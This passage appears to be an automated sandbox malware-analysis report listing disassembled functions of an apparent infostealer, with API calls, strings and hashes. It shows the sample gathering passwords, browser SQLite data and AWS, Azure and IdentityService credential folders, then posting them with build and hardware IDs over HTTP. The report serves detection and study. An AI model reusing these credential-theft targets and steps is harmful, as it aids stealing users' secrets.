                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 02A08AA6
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A08AAD
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,ERROR_RUN_EXTRACTOR), ref: 02A08B95
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02A371E8), ref: 02A08BAB
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02A371EC), ref: 02A08BD3
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A08CF0
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A08D0B
                                                                                                                                                                                • Part of subcall function 02A16E97: CreateThread.KERNEL32(00000000,00000000,02A16DC6,?,00000000,00000000), ref: 02A16F36
                                                                                                                                                                                • Part of subcall function 02A16E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 02A16F3E
                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02A08D4E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcpy$Processlstrlen$FileHeaplstrcat$AllocateCloseCopyCreateDeleteHandleObjectOpenSingleTerminateThreadWait_memset
                                                                                                                                                                              • String ID: ERROR_RUN_EXTRACTOR
                                                                                                                                                                              • API String ID: 2819533921-2709115261
                                                                                                                                                                              • Opcode ID: 83d8cd278548f1fb6500124150a7b3067b729e0958cb0cffdfa182a3d6215ca1
                                                                                                                                                                              • Instruction ID: 010a1a1cef4fd6ad618c1a288a92f106c9473ede937a4b89236d4eaa0289a565
                                                                                                                                                                              • Opcode Fuzzy Hash: 83d8cd278548f1fb6500124150a7b3067b729e0958cb0cffdfa182a3d6215ca1
                                                                                                                                                                              • Instruction Fuzzy Hash: D4E1FA31D80229AFDF01AFA0EE89ADD7B76BF04350F504521F905B71A0DF35AA998F94
                                                                                                                                                                              Function 02A0852E Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 230stringmemoryfileCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A11C4A: GetSystemTime.KERNEL32(?,02A36701,?), ref: 02A11C79
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 02A085D3
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 02A08628
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A0862F
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A086CB
                                                                                                                                                                              • lstrcat.KERNEL32(?), ref: 02A086E4
                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 02A086EE
                                                                                                                                                                              • lstrcat.KERNEL32(?,02A3719C), ref: 02A086FA
                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 02A08704
                                                                                                                                                                              • lstrcat.KERNEL32(?,02A371A0), ref: 02A08710
                                                                                                                                                                              • lstrcat.KERNEL32(?), ref: 02A0871D
                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 02A08727
                                                                                                                                                                              • lstrcat.KERNEL32(?,02A371A4), ref: 02A08733
                                                                                                                                                                              • lstrcat.KERNEL32(?), ref: 02A08740
                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 02A0874A
                                                                                                                                                                              • lstrcat.KERNEL32(?,02A371A8), ref: 02A08756
                                                                                                                                                                              • lstrcat.KERNEL32(?), ref: 02A08763
                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 02A0876D
                                                                                                                                                                              • lstrcat.KERNEL32(?,02A371AC), ref: 02A08779
                                                                                                                                                                              • lstrcat.KERNEL32(?,02A371B0), ref: 02A08785
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A087BE
                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02A0880B
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                                                                                                                                                              • String ID: passwords.txt
                                                                                                                                                                              • API String ID: 1956182324-347816968
                                                                                                                                                                              • Opcode ID: e33be57b1a34e08824f19bb3821f289a88a5630c16116931835ce09e94f020e2
                                                                                                                                                                              • Instruction ID: c0fc15fd5b8b904d96754d7622332e22be4eaa3ea8460600383d0a4ae8c12acc
                                                                                                                                                                              • Opcode Fuzzy Hash: e33be57b1a34e08824f19bb3821f289a88a5630c16116931835ce09e94f020e2
                                                                                                                                                                              • Instruction Fuzzy Hash: D581FD32D80228EFDF02BFA0EE49ADD7B76BF08311B504550F901B2160DF359AA59F95
                                                                                                                                                                              Function 02A169B6 Relevance: 37.0, APIs: 8, Strings: 13, Instructions: 249sleepCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A10549: lstrlen.KERNEL32(?,?,02A17174,02A366CF,02A366CE,?,?,?,?,02A1858F), ref: 02A1054F
                                                                                                                                                                                • Part of subcall function 02A10549: lstrcpy.KERNEL32(00000000,00000000), ref: 02A10581
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A168C6: StrCmpCA.SHLWAPI(?,ERROR), ref: 02A1691A
                                                                                                                                                                                • Part of subcall function 02A168C6: lstrlen.KERNEL32(?), ref: 02A16925
                                                                                                                                                                                • Part of subcall function 02A168C6: StrStrA.SHLWAPI(00000000,?), ref: 02A1693A
                                                                                                                                                                                • Part of subcall function 02A168C6: lstrlen.KERNEL32(?), ref: 02A16949
                                                                                                                                                                                • Part of subcall function 02A168C6: lstrlen.KERNEL32(00000000), ref: 02A16962
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 02A16AA0
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 02A16AF9
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 02A16B59
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 02A16BB2
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 02A16BC8
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 02A16BDE
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 02A16BF0
                                                                                                                                                                              • Sleep.KERNEL32(0000EA60), ref: 02A16BFF
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrlen$lstrcpy$Sleep
                                                                                                                                                                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$sqlite3.dll$sqlite3.dll$sqlp.dll$sqlp.dll
                                                                                                                                                                              • API String ID: 2840494320-608462545
                                                                                                                                                                              • Opcode ID: 41f927cb3a484ad0b5c8ed56bae990686175a01e1f38f76a3d9cd02bbaff9cc3
                                                                                                                                                                              • Instruction ID: 8401330ef556c7ed003c77fae36e795b0210defc1ea13e7e8a663d440dd7b801
                                                                                                                                                                              • Opcode Fuzzy Hash: 41f927cb3a484ad0b5c8ed56bae990686175a01e1f38f76a3d9cd02bbaff9cc3
                                                                                                                                                                              • Instruction Fuzzy Hash: 2E91D931E80228AADF11FBA5EE86ACD7776AF00B60F518161ED15B7150DF30AE498F94
                                                                                                                                                                              Function 02A01666 Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 129memoryfileCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 2315 2a01666-2a0169e GetTempPathW 2316 2a016a4-2a016cb wsprintfW 2315->2316 2317 2a01809-2a0180b 2315->2317 2318 2a016d0-2a016f5 CreateFileW 2316->2318 2319 2a017fa-2a01808 call 2a1d016 2317->2319 2318->2317 2321 2a016fb-2a0174e GetProcessHeap RtlAllocateHeap _time64 srand rand call 2a23c10 WriteFile 2318->2321 2321->2317 2325 2a01754-2a0175a 2321->2325 2325->2317 2326 2a01760-2a0179c call 2a23c10 CloseHandle CreateFileW 2325->2326 2326->2317 2329 2a0179e-2a017b1 ReadFile 2326->2329 2329->2317 2330 2a017b3-2a017b9 2329->2330 2330->2317 2331 2a017bb-2a017f1 call 2a23c10 GetProcessHeap RtlFreeHeap CloseHandle 2330->2331 2331->2318 2334 2a017f7-2a017f9 2331->2334 2334->2319
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 02A01696
                                                                                                                                                                              • wsprintfW.USER32 ref: 02A016BC
                                                                                                                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000100,00000000), ref: 02A016E6
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,000FFFFF), ref: 02A016FE
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A01705
                                                                                                                                                                              • _time64.MSVCRT ref: 02A0170E
                                                                                                                                                                              • srand.MSVCRT ref: 02A01715
                                                                                                                                                                              • rand.MSVCRT ref: 02A0171E
                                                                                                                                                                              • _memset.LIBCMT ref: 02A0172E
                                                                                                                                                                              • WriteFile.KERNEL32(?,00000000,000FFFFF,?,00000000), ref: 02A01746
                                                                                                                                                                              • _memset.LIBCMT ref: 02A01763
                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 02A01771
                                                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,04000100,00000000), ref: 02A0178D
                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,000FFFFF,?,00000000), ref: 02A017A9
                                                                                                                                                                              • _memset.LIBCMT ref: 02A017BE
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02A017C8
                                                                                                                                                                              • RtlFreeHeap.NTDLL(00000000), ref: 02A017CF
                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 02A017DB
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FileHeap$_memset$CloseCreateHandleProcess$AllocateFreePathReadTempWrite_time64randsrandwsprintf
                                                                                                                                                                              • String ID: %s%s$delays.tmp
                                                                                                                                                                              • API String ID: 1620473967-1413376734
                                                                                                                                                                              • Opcode ID: a6e5c41083faf4b8b1643b476aaa0a135c3e7befb158d3e7ef3eca9abe4a4aaf
                                                                                                                                                                              • Instruction ID: 509257d8eff323422eda4b38a14e930ffe29b7084e3b331f55d0da9dc09dd6b8
                                                                                                                                                                              • Opcode Fuzzy Hash: a6e5c41083faf4b8b1643b476aaa0a135c3e7befb158d3e7ef3eca9abe4a4aaf
                                                                                                                                                                              • Instruction Fuzzy Hash: 3E4186B1D40218ABDB605B61AC8CFEF7B7DEB85715F0009A9F10AE1081DF718A65CF64
                                                                                                                                                                              Function 02A04B2E Relevance: 33.6, APIs: 12, Strings: 7, Instructions: 378networkstringfileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A10519: lstrcpy.KERNEL32(00000000,?), ref: 02A10538
                                                                                                                                                                                • Part of subcall function 02A04AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04AE8
                                                                                                                                                                                • Part of subcall function 02A04AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04AEE
                                                                                                                                                                                • Part of subcall function 02A04AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04AF4
                                                                                                                                                                                • Part of subcall function 02A04AB6: lstrlen.KERNEL32(000000FF,00000000,?), ref: 02A04B06
                                                                                                                                                                                • Part of subcall function 02A04AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 02A04B0E
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                              • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 02A04BCD
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?), ref: 02A04BEB
                                                                                                                                                                              • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02A04D83
                                                                                                                                                                              • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 02A04DC7
                                                                                                                                                                              • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 02A04DF5
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                              • lstrlen.KERNEL32(?,02A36953,",build_id,02A377C4,------,02A377B8,",hwid,02A377A4,------), ref: 02A050EE
                                                                                                                                                                              • lstrlen.KERNEL32(?,?,00000000), ref: 02A05101
                                                                                                                                                                              • HttpSendRequestA.WININET(00000000,?,00000000), ref: 02A0510F
                                                                                                                                                                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 02A0516C
                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 02A05177
                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 02A0518E
                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 02A0519A
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
                                                                                                                                                                              • String ID: "$"$------$------$------$build_id$hwid
                                                                                                                                                                              • API String ID: 3006978581-3960666492
                                                                                                                                                                              • Opcode ID: 6cf1bb5c8e263d485c29b5b4848924b62275e8166c0ae20b26cb69a50897b36f
                                                                                                                                                                              • Instruction ID: ab7f8676f6f1fa8b4a375d9c20515b61391ee415c14b32a97b5a99c2a7397283
                                                                                                                                                                              • Opcode Fuzzy Hash: 6cf1bb5c8e263d485c29b5b4848924b62275e8166c0ae20b26cb69a50897b36f
                                                                                                                                                                              • Instruction Fuzzy Hash: 21028E31D9512A9ACF21AB20DE84BDDB7B6FF04350F4581E1A948B3154DE74BE8A8FD0
                                                                                                                                                                              Function 02A164BD Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 114stringCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • _memset.LIBCMT ref: 02A164E2
                                                                                                                                                                                • Part of subcall function 02A11DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 02A11DFD
                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 02A16501
                                                                                                                                                                              • lstrcat.KERNEL32(?,\.azure\), ref: 02A1651E
                                                                                                                                                                                • Part of subcall function 02A15FD1: wsprintfA.USER32 ref: 02A16018
                                                                                                                                                                                • Part of subcall function 02A15FD1: FindFirstFileA.KERNEL32(?,?), ref: 02A1602F
                                                                                                                                                                                • Part of subcall function 02A15FD1: StrCmpCA.SHLWAPI(?,02A36AB4), ref: 02A16050
                                                                                                                                                                                • Part of subcall function 02A15FD1: StrCmpCA.SHLWAPI(?,02A36AB8), ref: 02A1606A
                                                                                                                                                                                • Part of subcall function 02A15FD1: wsprintfA.USER32 ref: 02A16091
                                                                                                                                                                                • Part of subcall function 02A15FD1: StrCmpCA.SHLWAPI(?,02A36647), ref: 02A160A5
                                                                                                                                                                                • Part of subcall function 02A15FD1: wsprintfA.USER32 ref: 02A160C2
                                                                                                                                                                                • Part of subcall function 02A15FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 02A160EF
                                                                                                                                                                                • Part of subcall function 02A15FD1: lstrcat.KERNEL32(?), ref: 02A16125
                                                                                                                                                                                • Part of subcall function 02A15FD1: lstrcat.KERNEL32(?,02A36AD0), ref: 02A16137
                                                                                                                                                                                • Part of subcall function 02A15FD1: lstrcat.KERNEL32(?,?), ref: 02A1614A
                                                                                                                                                                                • Part of subcall function 02A15FD1: lstrcat.KERNEL32(?,02A36AD4), ref: 02A1615C
                                                                                                                                                                                • Part of subcall function 02A15FD1: lstrcat.KERNEL32(?,?), ref: 02A16170
                                                                                                                                                                              • _memset.LIBCMT ref: 02A16556
                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 02A16578
                                                                                                                                                                              • lstrcat.KERNEL32(?,\.aws\), ref: 02A16595
                                                                                                                                                                                • Part of subcall function 02A15FD1: wsprintfA.USER32 ref: 02A160D9
                                                                                                                                                                                • Part of subcall function 02A15FD1: CopyFileA.KERNEL32(?,?,00000001), ref: 02A16229
                                                                                                                                                                                • Part of subcall function 02A15FD1: DeleteFileA.KERNEL32(?), ref: 02A1629D
                                                                                                                                                                                • Part of subcall function 02A15FD1: FindNextFileA.KERNEL32(?,?), ref: 02A162FF
                                                                                                                                                                                • Part of subcall function 02A15FD1: FindClose.KERNEL32(?), ref: 02A16313
                                                                                                                                                                              • _memset.LIBCMT ref: 02A165CA
                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 02A165EC
                                                                                                                                                                              • lstrcat.KERNEL32(?,\.IdentityService\), ref: 02A16609
                                                                                                                                                                              • _memset.LIBCMT ref: 02A1663E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
